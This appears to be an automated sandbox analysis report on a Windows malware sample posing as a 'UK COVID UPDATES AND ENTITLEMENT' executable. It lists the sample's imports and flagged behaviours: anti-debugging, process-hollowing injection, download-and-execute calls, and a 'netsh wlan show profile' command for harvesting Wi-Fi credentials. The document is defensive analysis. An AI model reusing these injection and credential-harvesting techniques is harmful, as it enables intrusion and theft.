QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs 28_2_00402C45
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040BC9B
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all 28_2_00403183
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose, 28_2_0040F234
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00405AFB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004057B6
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004011A3 mov eax, dword ptr fs:[00000030h] 28_2_004011A3
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665C1D8 LdrInitializeThunk, 33_2_0665C1D8
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 28_2_0040D477
Writes to foreign memory regions
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 410000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 415000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 416000 Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Memory written: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe base: 83D008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile Jump to behavior
Source: dwnl.exe, 00000021.00000002.500313293.0000000002E73000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Managera\Local\Temp\dwnl.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: Program Manager1}
Source: dwnl.exe, 00000021.00000002.500150887.0000000002E2A000.00000004.00000001.sdmp Binary or memory string: Program Manager`i
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Manager|cmd|141v:November:Dec:De
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.431810210.0000000001430000.00000002.00020000.sdmp, dwnl.exe, 00000021.00000002.498536321.0000000001650000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000002.468970466.0000000002906000.00000004.00000040.sdmp Binary or memory string: d|0|cmd|Program Manager|cmd|r:March:Apr:April:Ma

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z, 28_2_0040818A
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
